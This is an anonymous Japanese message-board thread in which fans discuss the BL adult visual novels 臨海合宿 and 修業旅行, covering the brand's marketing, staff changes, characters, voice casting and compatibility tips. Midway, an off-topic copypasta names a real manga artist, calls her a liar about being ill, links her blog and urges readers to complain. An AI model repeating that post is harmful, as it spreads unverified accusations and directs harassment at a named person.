臨海は修業が好きだったから買ったって人も多いだろうし、
新作には有名原画やシナリオを連れて来るか、よっぽど萌えどころを
捕らえまくる設定やキャラとかじゃないと売れないんじゃないか
元々ユーザー数そんなに多くないジャンルだろうし、販売戦略をちゃんと
立てなきゃ商売なんて出来ないよ・・・ >臨海は修業が好きだったから買った
( ゚д゚)ノ ハイ!
その通り、体験版も見ないでいきなり特攻しました! 言葉は悪いけれど臨海が修業二番煎じっぽかったのでブランド買い出来ないというか…
β-pinkのこういう姿勢が好きだとかこだわりが好きだとかいうのが見えてこない
ゲームが色々出ていた時なら新作チェックしていたけど
今はスレや情報サイトを覗かなくなったって人も多いだろうし
臨海よりずっと厳しいんじゃないかなあ 前作を好きだから次も買う、っていう客層は回を重ねるごとに薄くなっていくからね。
だから販売戦略をちゃんとしないと、一見さんは誰も買わない、先細りになっちゃう
次もこういう売り込みだとヤバイよー
とにかく続編をくれ!っていう客が女向けゲームには多いみたいだから、
前作とのカラミを入れれば喜んで買うみたいなある程度のファンはついてくるだろうけどその先がない
毎回展開が読める分岐とか薄い宣伝とかもうちょっと危機感持つべき シナリオ構成使い回しのイメージがついちゃったからね…
次回作でシナリオ構成も変えるなら、
ちゃんと宣伝しないと「どうせ使いまわし」と思われるかもしれない 大まかな設定通り越してキャラクター性とかも重なってたもんね
臨海やったの最近だけど、事前にここ見て知っててもちょっと驚いたw
引き出しの無さが露呈しちゃった感もあるし
スタッフ入れ替えで新作ってのはいい試みだとも思う 流れに逆行しちゃうけど、ぶっちゃけ『このメーカーだから』だからではなく『このコンビだから』買ったゲームなので、スタッフ入れ替えられちゃうと…
せめてもう一作出して欲しかった。 修業コンビをどこかで拾ってくれたら言うことなしなんだが…
お二人とも本業がある人たちだし難しいのかな キャラも好きだったけど「修業旅行」にしても「臨海合宿」でも
学校行事で学生のグループがあって学生内やら先生やらでリバ有りで、ってとこに
ものすごく萌えてた。
学生ものゲームは他にもあるけどたいてい主人公総受けでリバはないし
なんていうかそのルートではカプにならないキャラであっても主人公を中心にして
バラバラだった学生グループが仲良くなっていく様がたまらなく萌えだったんだよ。
この路線のままで行って欲しいと思ってたし掘り起こせば需要もあっただろうけど
今更だけど売り方下手だったよね。 ただその「もう一作」が従来と同じだと何の意味もないわけで。
こっち側、希望サイドは「やっぱり合宿ものでー」「前の人たちもちょっと出してー」「続編ー」
って言いたくなるけど、それだとメーカーと製作コンビの将来が閉ざされて終わる コンビが好きで修業も臨海も好きだけど
コンビならではの「色」があるとして、だからといって使い回しは違うと思うんだよなぁ
だからメーカーの姿勢としては、スタッフ入れ替えも一概には否定できないかな 本当にごく普通の学生さんたちの世界ってのが凄くよかったし
リバ好きにはありがたいブランドだけど
これってゲームをやってみないと面白みがわかりにくいよね
こう…なんでもありの世界の方が雑誌や絵で見るにはインパクトがあって見た目が派手で楽しい
ここは雑誌にもほとんどのらなくて狭い口コミでしか広がらなかったのがまずかったんだろうなあ 今までのレス全部、社内会議にかけてくれよほんとw
これだけ販売戦略を心配されているブランドも少ないよ
単なるアンチ意見ではなく真面目な意見ばかりだし
修業も臨海も好きだからこそなんだよね このコンビがどうとか、合宿物がどうとかいう問題じゃないんだよね
展開が全く同じというのが問題なんだよな
同じ世界観を持つというのは全然かまわないんだけど、
臨海は修業を引きずり過ぎだったと思う
従兄弟くらいなら、おおーっと思うし、それだけで修業と同じ世界観というのが分かって
楽しかったのに、他キャラまで出てくるとへ?って感じだったな
それに加えて展開も全く同じだから、なんとなく釈然としない物を感じたよ
ゲーム自体は好きなのにな
臨海やって修業やったらまた違ったんだろうなとは思った
修業やって臨海だと何か微妙に劣化している気がするのが余計に残念だった
どちらも好きなのにね スタッフを変えて欲しいというんじゃなく
作り方を変えて欲しいってことになるのかな
ただ、それができないならスタッフ入れ替えもそりゃ仕方ないわな 個人的には修業より臨海の方が好みだったんだけど
もうちょっとどうにかならなかったのかな・・・って部分も多いから人に勧め辛い
あそこまで修業を踏襲する必要はなかっただろうし、だからこそまた
あのコンビで全然違う雰囲気の作品を見たいんだ・・・ しかしいつも思うのはこのスレとこのスレの住人が大好きだw スタッフ入れ替えは臨海の失敗点も踏まえて
メーカーの姿勢として必ずしも間違ってはないと思うんだけど
「あのコンビのメーカー」と認識されがち側面から見ると
それはそれでアピールを間違えてる気もするな
良くも悪くもブランドカラーが定着しすぎてる >>544
今の流れだと多少なりとも否定的な意見も多いわけだけど
それに対してアンチするなと騒ぎ出す人もいないよね
良いユーザーに恵まれたブランドなんだし、頑張って欲しい >>543
自分も臨海の方が好きだったかな
だけど、前作の主人公の従兄弟なんですよ、ってとこまではいいとしても
ツンデレが主人公にツンデレな理由が従兄の親友だったりとか
全般にちょっと内輪受け要素がありすぎだったから焼き直し感が強かった 自分は臨海やってみて面白かったから修業も買ったけど、
修業の方が全体的に得体の知れない怖さが出てて好きかも
臨海はイチルートの石碑の前での霧に捲かれるシーンはびびったけどw
このコンビでせめてもう一作作って欲しかった
焼き直し感は分かるけど、自分はむしろそれが嬉しいかな
好きなゲームがまた新作として出来るわけだし
シリーズ物ならシステム同じってのも多いよね?(シリーズ物としてじゃなく
出したんだから、そういう言い訳は通用しないのはわかるけど)
自分が臨海→修業の流れでプレイしたからそう思うだけかも知れないけど
(臨海やる時点で、なんか「元ネタ」があるらしいってのはちょっと知ってたし)
修業と臨海の重なり具合は「システム同じ」とは全然違うと思うがw
シリーズ物=焼き直しじゃないぞ
>>548の言いたいことは単純に作品やコンビが好きだから
まだまだ作り続けて欲しいってことなのはわかるんだけどね システムが同じ=先の展開が読める、分岐がわかる、すること全部同じ(女装とかキスだけルートとか)
とは違うと思うんだ。
同じコンビで作ってくれると従来のファンは喜ぶけど、それは「メーカー」に対するファンじゃないから
それ以後に続かないし。多少ライターなり絵師なりに混ぜものしてもいいから、「前作にない要素」を
取り入れて欲しい。 修業→臨海の順番でプレイしたけど、>>548と同じでむしろそれが(ry
同じ様なものを作り続けたら先細りしちゃうという理屈は分かるんだけどね。
うっかり「次はスキーだ」って期待しちゃってたからなぁ…
単純にスタッフ入れ替えを選択するのではなく、展開の見直しを図って欲しかったね。
学生同士の絆とか雰囲気とか良い所を残して、前作とは別要素を加える、と。
あとは酷い部分のあった一枚絵の向上かな。 臨海発売1周年おめでとう!
いっぱい萌えをもらったよ
新作も一応期待しとく >>553
新作って決定なのかな
冷微の記事だと作る意思があるって位かと思ってた
どういうもの作るのか興味あるから、ぜひ頑張って欲しい 工工エエェェ(´Д`)ェェエエ工工
アゴしゃくらせながら歌ってるとかへんなエフェクトかけてるんじゃないでしょうねこれ
夜中なのに鼻が詰まった 一瞬、あの有名な主題歌がスーパー☆なメーカーを超えたかと思った・・残念な感じに仕上がってるね むしろあのメーカーの主題歌☆くらいまで突き抜けちゃったら、
それはそれで話題になって好奇心から臨海を買う人が増え・・・
という展開も無きにしもあらずだと思うんだが
そこまでは到達出来なかったね ☆は今でも忘れられないもの凄さ
あれを超えるのは難しすぎるw でもわかんないよ、最初からこの残念なバージョンでやってて
しかもことあるごとに流してたとしたら。ミラクル☆おきたかもよ。アレ的な意味で
ゲーム中身の萌えとぶつかりあってひどいことになってたと思うけど そういやダウンロードしておいたけどまだ聴いてなかったなぁと思いつつ、
みんなそこまで言うほどヒドイくはないだろ………
出だしでマジで梅酒吹いた。 残念な感じっていい過ぎじゃないの…そう思っていた過去が私にもありました
どの方向に走っていこうとしてるの、β-pinkさん('A`)この残念な感じ! wktkしてダウンロードして聞いたらなんという\(^o^)/
聞いてたらだんだん慣れてくるかもって思っても
これはないかな・・・。 新着はゲームの感想じゃなくて荒らしだったのね
まだログが壊れたままのろころがある
だいたいここのメーカーって何で粘着されてるの?
他のメーカーみたいに粘着される理由なんて見当たらない気がするのに
MERRY BOYS メリーボーイズ + β-pink 総合避難所
ttp://jbbs.livedoor.jp/otaku/4514/ ×まだログが壊れたままのろころがある
○まだログが壊れたままのところがあるorz それをここに書き込むと、また新しい愉快犯を呼び込むことにもならないかい?
それに、避難所には全くノータッチの住人だってここにはいると思うんだけど >>571
ならないでしょ
避難所には管理人がいるんだから
愉快犯が来てもアク禁にすればいいだけの話
それを知ってて荒らしてるってことはよっぽどだと思うんだけど
何か理由があるんだろうか?
しかも、ここではなく、アク禁にされやすい避難所を荒らしてるのが謎
ブランドではなく板を立てた管理人に恨みがあるんだろうか?
でも臨海が発売されたばかりの頃公式のBBSも荒らされてたよね
常識で考えたら公式は荒らしたりしないと思うんだ
避難所荒らしにしても公式荒らしにしても(同一人物の気がするんだが)
他メーカーに粘着してる荒らしとは違った個人的な私怨(しかも根深いもの)を感じて
その理由を知りたいと思った 公式掲示板は特定の人物による荒しというよりよくある掲示板スパムだと思う
ちゃんと管理をしていれば防げるものを放置していたから
避難所の話なら避難所で聞けばいいのでは?
今はこのスレも落ち着いているし、わざわざこっちに話を持ち込んで蒸し返さなくても あけましておめでとうございます!
今年は公式で動きがありますように ★山本プロのくせに仕事を放置・仮病を使ってツナ受け(笑)同人原稿(2冊分)を描いた佳奈★
コミック シルフで山本が咎狗の血をコミカライズ
↓
シルフと単行本で小冊子応募者全員サービス(当然の如く負担金有り)
↓
いつになっても小冊子が届かない
↓
メディアワークスの「誌上通販・応募者全員サービスの発送状況」に延期のお知らせ
↓
山本のブログに病気が原因で原稿が遅れていると謝罪文が掲載される
↓
しかし、冬コミで新刊ツナ受け本2冊発行(山本が売り子をしていた)
↓
一部住人が荒れる
↓
シルフに凸した人が返信メールをうp
↓
やっぱり原稿が上がってないのが原因らしい
↓
ツナ受け(笑)
↓
早く原稿描くか金返せ←いまここ
★苦情は下記へどうぞ★
仕事より同人原稿を優先したツナ受け(笑)大好き山本病気は嘘でした佳奈のブログ
ttp://atmos.qee.jp/memo/
ネガヒスト↓仕事を放置して描いたツナ受け(笑)2冊
ttp://acute-girls.com/nega/
山本佳奈
ttp://changi.2ch.net/test/read.cgi/gcomic/1231327570/ 朝から脳内でピーカン☆Midsummerがとまらない
ウワァァ!!
(>'A`)>
( ヘヘ 最近はプレイ控えてるのになんでだー! >>577
新情報かと思ったら何コレ
うつっちゃったじゃないかw
そういや臨海はピーカン以外脳内でまわったことないけど
修業の方の音楽は結構まわってる
曲数少ないから頭に残りやすかったのかな 誰かがすくみず穿いてると聞いて↓
名無しさん@初回限定:2008/11/23(日) 16:46:43 ID:3rKiirC4O
2008年のカレンダーではβ-pinkできたえろ組合に参加していたよ。
なぜかカレンダーの絵はすくみずだった。 原画さんの絵が気に入って買ったんだけどこれってフルスクリーンがデフォ?どうやってもウインドウサイズにならないorz >>581
画面上のツールバー内の設定(C)→画面(S)→ウィンドウ表示(W)でできるよ? 設定で見たんだけどウインドウズ表示がグレーになってて反応しないんだ…環境設定も押しても押しても青にならないしボスケテ 久しぶりに公式にアクセスしたんですけど
サンプルボイスなんて初めからありましたっけ? 先に臨海やって、面白かったから修業買った!
面白かった!
面白かったんだ…が… 智成…orz ( ゚д゚ )それは言うなwスレ違いだが言うなww 霧原萌えーエロくて(゚∀゚)イイ!
声がすごい好きで中の人調べたらあんま出てない人なのね…
体験版でキャラが解説してくれるのは良いね、声付きだし
こういうとこは凝ってくれるのに公式の寂れ具合は…
他の姐さんも言ってる通りもうちょっと頑張ってくださいな 臨海開始しました。
眼鏡の人が出てくる度に「うざッ!」とつぶやいてしまうんですが。
あれが攻略対象とかどういういやがらせですか?
とりあえずカラーリングが滝によく似た人から攻略します。 >>588
まぁまぁ、眼鏡君も良いコだから。
試しに攻略してみれば?
意外にハマるかもよ。 わたしは最後まで眼鏡のあいつ、無理だったよ
キャラクターは好き好きあるから、仕方ないよ 自分の萎えは他人の萌えさね
どうせなら萌えを語ってくれた方が平和でありがたい
太田はギスギスしがちな序盤に、KYなマイペースぶりでほっとさせてくれた
エロシーンも攻め受け共に意外ながんばりを見せてくれたしなw 眼鏡は二人いるんでどっちのこと言ってんだかわかんねwww >>588 です。
食いつきたい で悶えました。こっちの幼なじみは萌えられる。
ですが、このキャラ相手にどう攻めろと?攻撃力が違いすぎます。
あと壱之って かずゆき とは読めませんな。ムダに良い声の加持父。
そしてなぜ いち なんだよ。カズだろ。皇帝だろと。
ツンデレさんとえっちなお兄さんはリバに違和感なかったんだけど。
これから進む主人公?壱シナリオにはガクブルです。三十路と眼鏡はまだ。 >>588です。連投スマヌ。
奪 わ れ ま し た
心配する必要はなかった。
でもそれでいいのか主人公。 太田の眼鏡は鬼畜眼鏡でした。
あの実況の仕方は絶対にAV見てるだろ。
しかもSM系の。ありえねえから、中学生なのに。
主人公の涙が痛々しかった……。
……そしてムダにスチルのデキが一番良かったんだぜ……。
太田は黙って受けてりゃいいんだよッ!(涙目)
受けるときは眼鏡を外すのがマナーだかんなッ! >>596
お前なに言ってんの
スプレスレに帰れよ 太田の顔、髪型、眼鏡、、制服の着方、性格、喋り方、甲高い声
すべてがイラッとくる この絵師・シナリオコンビのゲームは、やっててスゲー楽しいから好きだ
グロ立ち絵にビックリしたのも今では良い思い出w
SSとかオフィか雑誌でやってくんないかなぁ
笑える会話に飢えてるんで読みたいよ 修業と変わらないとか言ってる人いるけど
正直、臨海の方がエロテキストは濃かったと思う。
修業はつっこまれてホワイトアウトが多かった。
事件の方はそれぞれ別のオチを用意するから苦しくなるし
分岐も似るし、展開も似たような印象を受けるんだと思う。
私はこのライターさん相当頭いいと思う。萌えシチュのバリエも多い。
だけど無難に収めようとしすぎて小粒感が否めないんだよ。
そして完全無欠のかっこいい奴を出したくない人なんだろうな。
ある意味ニトロと真逆の方向性なんだ。 だからニトロとかそういうのお呼びじゃないですから。変なの比較に持ってこないで 話の展開と分岐が似た印象ってのはゲームとしては致命的
キャラは萌えるし掛け合いも上手いからB太さんのシナリオ好きだけどさ。
このままだと売り上げは尻すぼみだろうしライター、原画変更は仕方が無いと思うけど
B太さんが違う雰囲気のシナリオが書けるのか見てみたかったな テキストがよりエロとかいう問題じゃないんだよな…
新ブランドで展開が全く同じというのは正直期待はずれだし、(ゲームは楽しんだ上で)
下手したら手抜きだと思われかねない
まあ、修業人気を見込んでのことかもしれんが、
あまりにも引っ張りすぎ
> 事件の方はそれぞれ別のオチを用意するから苦しくなるし
> 分岐も似るし、展開も似たような印象を受けるんだと思う。
似たような印象を受けるんじゃなくて、
どう贔屓目に見ても全く同じだからな 臨海を修業と似た感じにしたら修業+新規の売り上げが見込めると思ったのかなぁ たぶんそうだろうね
修業キャラもかなり出っ張ってたし まずやることやればいいのにね。会社の姿勢を一番に変えるべき
やる気のない公式サイト、宣伝も少なすぎ ストーリー展開は別としても、ゲーム自体はそう悪くないのにね そうだよな
雑誌であまり売れなかったとか書いてたけど、
まず売る努力をしろと もし、万が一、次回作がヒットして人がいっぱい入って来たら
修業と臨海は黒歴史になるんだろうか… ちょ、だって黒歴史って言うほど駄作でも問題作でもないじゃない。
あえて言うならショタの声がおっさんってくらいで。 そう、いうならショタの声が当人にとって黒歴史じゃない? エイプリルフール企画でHP更新するなんて、それこそエイプリルフールだろβ-pink的に考えて…… 絵師とライター変わるんじゃまたブランド名変えるのかな?
β-pinkって絵師とライターの名前から付けたんだろうし
メリボのままで良かったのにね ブランド名「変えた」わけじゃなくて、別レーベル立ち上げだから 他社だけどブランド公式にまで感染が拡大してるみたいだから貼ります
乙女&BL@GENOウィルス注意喚起スレ
http://schiphol.2ch.net/test/read.cgi/ggirl/1242500770/
【管理も】同人サイト・GENOウィルス注意5【閲覧も】(実質6)
http://changi.2ch.net/test/read.cgi/doujin/1242540064/
同人サイト向け・通称「GENOウイルス」対策まとめ
ttp://www31.atwiki.jp/doujin_vinfo/
まとめwikiは、管理人一人によってFTPを用いずブラウザ経由で更新されているため安全が確認されています。
まずはこちらを熟読してください。 今更ハマってしまったorz
兄特典の霧原編ききたくて探したが今更あるはずないよな…
ちゃんと新品で購入して貢献したいし、買いなおすつもり
だから新作とかファンディスクとか何でも良いから動いてくれ…(´Д⊂
なんでもっとと早くハマらなかったんだああああああああ
>>626
ようこそ、常夏の楽園へ
特典聞く機会あるといいね 自分も霧原好き。美人エロお兄さん声も良い
大型犬イチもかわいいよイチ
なんでもいいから公式動いて欲しいね… 霧原(・∀・)イイ!
性格もさることながら声もよかった
もっとBLゲー出てほしいな、エロゲではよく見るけど
あとおっさんにも萌えた
宇佐見はワロタ 宇佐見はしゃべり方で笑っちゃうんだよねー若本御大みたいで 自治での話し合いの結果
タイトル別にバレ&攻略スレを立てられるようになりました
スレタイはロカルルールに沿って攻略の文字抜きで
BL@○○○○○スレ1【ネタバレ】
詳しくは下記をご覧ください
女向ゲーム大人板 自治スレその3
http://schiphol.2ch.net/test/read.cgi/gboy/1162203929/ ここのブランドってもう新作出ないのかなぁ
絵もシナリオも好きだ 絵の人もシナリオの人も一新して新しいの出すんじゃなかったか
このブランドで新作が出たとしてももうこの二人じゃないと思うとさびしい 臨海が夏、修業は季節は決まってたっけ?
スキーで遭難とか殺人事件がとか考えてたわw >>397より
こういう構想らしい
> とりあえず現時点でアイデアとして浮上している構想はいくつかあるようで、
> 1つ目はファンタジーモノで、4人の主人公それぞれの視点から物語が展開していくそうだ
> キャラのテーマカラーと性格も考えているそうで、緑髪の奴は嫉妬深くて二重人格、といった風になってるらしい(あくまでアイデア段階)
>
> 2つ目は歴史モノで、武将や忍びの者が大活躍するそうだ(あくまでアイデア段(ry
> 3つ目・・・というか、もし出すならアイドル養成学校はどうかなとも言っているが、
> 決定しているタイトルが『聖・モロコシ学園』というのはいかがなものかwww(あくまでア(ry
> 4つ目が「男子ペアフィギュアモノ」。男の子同士が手を取り合って銀盤の上を華麗に舞うそうだw
で、4つ目で
ttp://oretachi.gaga.ne.jp/
これを想像してしまったわけだが >>638
ワロタw
歴史物いいなぁー男子ペアフィギュアモノとかもなかなか
夢ばっかりがひろがりんぐ 修業も臨海もそれぞれ面白かったし
何より私の低スペックPCでもサクサク遊べてよかった
旅行ネタじゃないのは楽しみだけど
原画とライター変わっちゃうのは残念だな
男の子らしい受けで好きだったのに 良くも悪くも普通の男の子って感じだったね>主人公
大人びてるわけでもガキすぎるわけでもなく、って感じ それこそ普通な男子高校生の日常会話がたまらなかった
あと友情が少しずつ恋愛感情になってく過程がたまらなくいい 最初ここで姐さん達が楽しそうにやってるの見て買ったんだよなあ
で大当たり
ちょっとひと昔前の青春モノっぽい雰囲気が大好きだったよ あんまり青春群像劇チックなボブゲって多くないね
臨海・修業の他にはスプレのそし僕とかしか思い浮かばないや
B太さんと金目鯛さんのボブゲやりたい >>645
BLゲー初心者だけど修業、臨海、そし僕。全部面白かった!!
こんな感じのゲームをもっとやってみたいのですが…スレ違いだったらゴメ 普通の学園ものってのがいいんだよね。普通の学生の会話とか。和む
ライターさんの修業と臨海とはまったく違う話の流れの学園ものがやりたかったよ
ところで別ブランド立ち上げって言ってもライターも原画家も違うんじゃ
ここの別ブランドだって分からないかも知れないよね >>397とか公式には書いてなかったけど
原画とライター交代だけどブランドまで変えちゃうの? ブランドこのままでライターと原画を変えるって話じゃなかったっけ?
ブランド名が中の人にちなんだものだと思っていたから残念だなあと思ったもん ブログ更新も無いまま一年かー
ブランド生存確認もできない 結構人いたんだね。びっくりしたw
>>650-651
ブランドはこのままなんだったっけ。勘違いしてたスマン
ほんとライターと原画家の人の名前からとったブランド名なのに変えちゃ意味ないよねw ブランド名はMERRY BOYSのが良かったとオモ 臨海が2007年頭位発表だったよね?
来年頭に動きありますように! >>655
中の人同じでも会社違うから前のブランド名は使えないんでは
臨海で前作キャラの名前が明確に出なかったりしたのは
その辺の兼ね合いもあったんじゃないかなと めりーぼーいずはメリボって略せて良かったけど
べーたぴんくって呼びにくいし書きにくいよね
ブランドそのままでやってくならサイトをもうちょっとオサレに改装したほうが良いと思うなぁ このブランドの会社って貧乏で有名なアボガドパワーズなんだね
次作は無理かもしれんな
>>660
>貧乏で有名なアボガドパワーズ
何か萌えるw
もし次作が出て良作なら応援したくなような響きだ>貧乏で有名なアボガドパワーズ 会社は有限会社スケアクロウで
アボガドパワーズと同じ系列だった、スマン
何にせよ貧乏なのには変わりないが 失礼だなと思いつつワロタw >貧乏で有名なアボガドパワーズ
もし次作出たら絶対買うよ。なんか応援したくなってきた 何かみるからに貧乏そうだもんね…
次回作期待してる。もうサイトは放置なのかな 最近臨海をクリアしたんですがディスクレスでやったせいかパソコンの相性が悪かったのか
BGM流れず。声とSEは普通にあったので気づかずプレイしてた。
スタッフロールで主題歌って書いてあるからおかしいなと思ったんですけど。
ここのログ見てたら流れなくて良かったのか悪かったのか判断に困るなw
>>667
ノシ
同じ症状出たよ
PC新調して久々にインスコしてみたら主題歌だけ流れなかった
きっと相性があるんだろうね
あの歌エンディングがスキップできないからずっと聴いてると癖になるw
でも嫌いじゃないwww >>583
遅レスだけれどまったく同じ
自分の場合はネットブックってこともあるからかも知れないけれど 一瞬公式のホムペがあぼんしてるのかと思った
稼働率的には確かにどこ行っただけど… 昨日レス見ていったら無かったからほんとにあぼんしたのかと思った
たぶんメンテとかだったんだろう 誰か見てたら、臨海合宿がwindows7に対応してるのかどうか教えてくれ〜 >>674
7が出る前のゲームなんだから対応はしてないだろ
PC詳しくないから原因はよくわからんが、うちの7にはインストールできなかった
前使ってたXPに入ってたのそのまま持ってきたら普通にプレイできたけど このゲームに限らずの話だけど、インストールするexeファイルがOSの違いでうまく起動させられない場合でも、
既にインストールした後のファイルを持ってきたらゲームは普通にプレイできる、とかってケースはあるみたいだね
外付けHDDとかにインスコしておけば楽かも みなさんtnx!
こんなに早くレスつくとはwwこのソフト愛されてるのね
そうかぁ、じゃあ悔しいが買うのは断念しようかなー
外付けHDDにインストールすれば可能性ありってことか?
存在知らなかったんだけど、いまさら見つけてしまい…
やってみてぇ
けど買ってプレイ出来なかったら悲しい >>674
まだ見てるかな?
Win7(64bit)で自分がやった力技なインストール法は
ディスク入れてフォルダを表示させたあと
program files→B-Pinkの順でフォルダを開くと臨海合宿というフォルダがあるので
それを好きなところにフォルダごとコピーする
あとはフォルダ内のScrPlayer.exeを実行すれば無事に旅行に出発できます こんなゲームにグロ立ち絵があるとは思わず、油断してたよなぁ
ホラーもスプラッタも平気なのに特にリアルでもないあの絵にビックリしたw
ショタが超低音声な新作はまだですか?w 今更ながらに臨海プレイした
真田が私の好きな受けキャラタイプど真ん中過ぎて萌える
リバ苦手だから…と敬遠していた過去の自分を殴りたい
ここで皆とリアルタイム萌え語りしたかったorz
公式展開も望めないみたいだし、このたぎる想いをどうすれば…
とりあえず、順番逆になったが修業やってくる! >>684
修業は会話が面白いから楽しくゲーム出来るよ!おススメ! 霧原の声って、誰? 太田は高木 真柴は下野ってのは特定したんだけど、霧原が分からない。 原画さんとシナリオさんのサイトなくなった?
この間は入れた気がしたのになぁ…
臨海のボツネタUPされるのひっそりと待ってたのに >>688
どっちもあるよー?
共同サイトという意味なら無くなったみたいだけど、個別のなら存在している
二人の名前でgglと発見できるとおも >>689
ありがとう!みつかりました
臨海も修業も自分はまだ主人公受けルートしかやってないけど、キャラの性格等にブレがないなら攻めルートもやってみようかなぁ。 攻めルートも楽しいよ可愛いよー
対するキャラによって、「主攻めが好み」「主受けが好み」「甲乙付け難い」と分かれたな、自分の場合
リバで良かった 修業→臨海とクリアしてきたどー記念かきこ
さてさて合宿続行ルートに取り掛かろう 修業の廉価版が発売されるなんて全然知らなかった
てかブランド生きてたのかな?
メッセで付く特典って、多分昔付いてたのと同じROMだよね
公式に葉書出したら貰えたっていうミニドラマ(?)が収録されてたらもう一本買ったんだけどなぁ 廉価版mjdk!?と思ってググっちゃったよ
どんな形でも良い、生きていてくれたのなら >699
今日廉価版買ってきた
封入特典で「初詣」のドラマCDがついてたよ 699だが、自分も通販で他のソフト予約しようとしててたまたま
他の予約受付中ソフトの中に発見したから、本気でびっくりしたよw
メリボが生きてたのか、それとも普通にβが引き継いだのかな
まぁどっちでもいい、スキー合宿(仮)が出るのなら…!
>>701
うおおマジか!!
封入特典って事は、メッセでなくても付いてるってことでいいんだよね?
お手頃価格になったことだし、お布施も込めてもう一本買ってくる! 尼で予約したけどまだ発送準備中にもなっていない…
GWは始まったばかりだし気長に待とう 臨海と修業がダウンロードサイトにあったよ値段も廉価版より安い
臨海がVISTAでできるかもと思ったけど表示されてなかった修業はVISTAでできるようになってるのに
夏だねぇ〜
臨海の季節だし久々にプレイするかw
つり目主人公と加地のわんこ攻めすごい好きだ
シナリオも絵もいいのに何であんまり売れてないんだろう
スキー合宿やりたいよー >>705
同意
本当に面白いのにね
発売された18禁BLゲの9割方はプレイしているけれど
このゲームが一番萌えたし、シナリオが全ルート違うのが脱帽だった
次回作もずっとずっと待っている こっちを先にやったらそう思わないんだろうけど
修業先やって後から臨海だとちょっと残念気分にはなる
でもこの懐かしい感じと普通っぽさがたまらなく好みなんだ
同じくスキー合宿やりたかったなあ OPが色んな意味でネタだった割には
購買意欲をひく出来ではなかったし
私は好きなんだけど絵が地味って言うか古い感じがしたからかな
スキー合宿やりたいです ごめん自分はOPで購入意欲引いて買うまで時間かかった
あと体験版がネタバレしすぎ >>709
購買意欲引くじゃなくて誘うの間違いだったw
あのOPはないよな…曲自体は懐メロっぽくて
好きだったんだけど初見には残念すぎる出来 DL版で臨海と修業購入
臨海の歌が脳にこびりついて離れないです
攻略キャラごとに結末が違ってるので各ルート楽しめますた
で、次回作を期待しちゃ駄目・・・ですか・・・・・
普通の男子な感じの主人公とか、絵柄好きなんだけどなぁ 修業をDL購入してプレイしてるけど雪成が合ってなさ過ぎて吹いたw
どう聞いても合ってないのになんでキャスティングしたんだろ >>716
本当になんでだろうね…
あの外見で声まで幼かったら彼が18才以下だという誤解を招くからカナー
なんにしてもこの絵師とライターの三作目が出そうにないのが残念
しょーちゃんとナオの絡みが好きだからもっと見たかった 本当に申し訳ないけどあの兄弟だけはいまだに音声オフだわ 自分もあの声が受け付けなくてOFFにしてプレイ中だ
でも、あまりにも印象深い声なので脳内であの声が再生されてしまう 最初聞いたとき、大丈夫いけるいけると思って進めていたけど
さすがにそういうシーンになった時にはすいません、オフで…になってしまった 兄の方はともかく、弟には少年声の女性声優でも充てりゃ良かったんじゃ内科
それともなにか拘りがあったのかと思ってたけど
>>719な理由もあるか、なるほど
…ブランド、再始動しないかなー 弟の中の人って某大阪の高校生探偵の人だよね?
声があってないからか下手に聞こえる
子供の声を演じると酷いことになる人っているよね
その昔にんじんのつや煮を演じた人も同じ系統の破壊力だった
ブランドの再開は一生座して待つ覚悟
例え刷り込みであったとしてもMy神ゲだ ここ生きてるのかなあ
ごくごく普通の男の子って感じが大好きだったんだけど 話題を振ればきっと誰かが答えてくれるさ…!
キャラは勿論ストーリーの起承転結がしっかりしてる所が好きだ
最後に見た公式の動きは修業に入らなかったイベントのテキストデータ配布かね
臨海は廉価版出たんだっけ 臨海の廉価版は多分まだ出てない。DL販売は両方してるみたいなんだけど リパッケージ版がでたのはどっちだっけ?
臨海のでかい箱が小さくなったとかの話題聞いたような…
あれが修業の話だったんだろうか ブログ今更見たら、次回作も準備中ですみたいなこと書かれてるのにな・・・ 上がってるから何か更新あったのかと思ってしまったよ… 自分も釣られてしまったw
せっかくだから臨海再プレイしてこよう 1年近く書き込まれてなかったんだなぁ
何か良いニュースがあるといいんだけど 他にも動きを待っている人がまだいて嬉しくなったー
自分も再プレイしてくるっ こないだ近所の店舗で臨海が投げ売りされていたんだけどWin7だと、これプレイ出来ないのかな?(涙) VISTA時代に外付けに入れてあったの起動しようとしたら7ではインストールできなかったわ・・・
悲しいな・・・
でも修業旅行はできた!!久しぶりに見ると瀬永可愛いな
テンプレツンデレ眼鏡だけどそこがとても良い >>737
レスdです。
そうか、臨海はやっぱりダメなのか…。
一緒に修業の方も購入したから、修業をレッツプレイして来ます。 自分もvista時代に外付けに入れたけど、7でも起動できてるよ
公式に書いてある通り、インストーラー使わずに手動コピーでやればいけると思う 自分は7起動ダメだった…
これに限らずだけど古いゲームやるのにXPのノートが捨てられない 臨海合宿始めました(´・ω・`)
Win7だけどProgramfiles直接移したら起動できたで
誰から攻略しようか非常に迷うけどとりあえず委員長は絶対萌えない気がする トールケースサイズで廉価版出してくれないかなあ
ずっと手元に置いておきたいのに箱が…箱が邪魔なんです…
>>743
委員長最萌だけど「そんな事ないよ!萌えるよ!」と言い切れないのが辛い コンプしましたシナリオは霧原が一番面白かったですね
ギャップ萌えってやつでしょうかちょっとヤンデレ気質もありますよね
最萌は真柴なんですけど真柴霧原で真田をサンドするようなENDがあっても良かったと思います
嫉妬でセクハラを止めているときの真柴が一番輝いてましたね(´・ω・`) あと真柴役の人喘ぎ声のエロさが尋常じゃないですねさすがベテラン >>743どおりWin7で直接移したつもりだったんだけど起動できなかった…
やっぱXP買った方がいいのかね 今こういう普通の学生の青春ものって貴重だよなあ懐古趣味で
気がめいる複雑なゲームばかりじゃなくてあっけらかんとした
楽しいゲームがやりたくてオタショップでつい買ってしまった
古いゲームなのにお値段はそれなりだったが満足だ主人公がかわいい
ビスタなので起動に苦労したけれど何とか成功
好みのゲームなのにもう新作は作らんのかな?とりあえず楽しんできます >>749
いらっしゃい!
こういう嫌味のないのは構えずにできて良いよね
自分も最近久しぶりにギャラリー眺めてニヤニヤしてたとこなので
ご新規さんが増えるのすごい嬉しい
楽しめるのを祈ってるので、是非また語りにきてくれ 攻略中だが楽しいので感想投下
わんこ攻めの加持からクリア真田がたじたじになってるのもかわいい
真柴のつんつんの意外なもろさににやにや
太田真田おぼれたとこの泣き顔かわいいほんわかした
霧原えろいよ一番えろいルートかも翻弄されとる真田がかわいい
リバゲーはあまりしないんだがこれはこれでなかなか楽しい
真田がどのルートでも非常にかわいらしく三白眼は正義だと確信した
しかしエンドロールが飛ばせないのは地味に痛いw
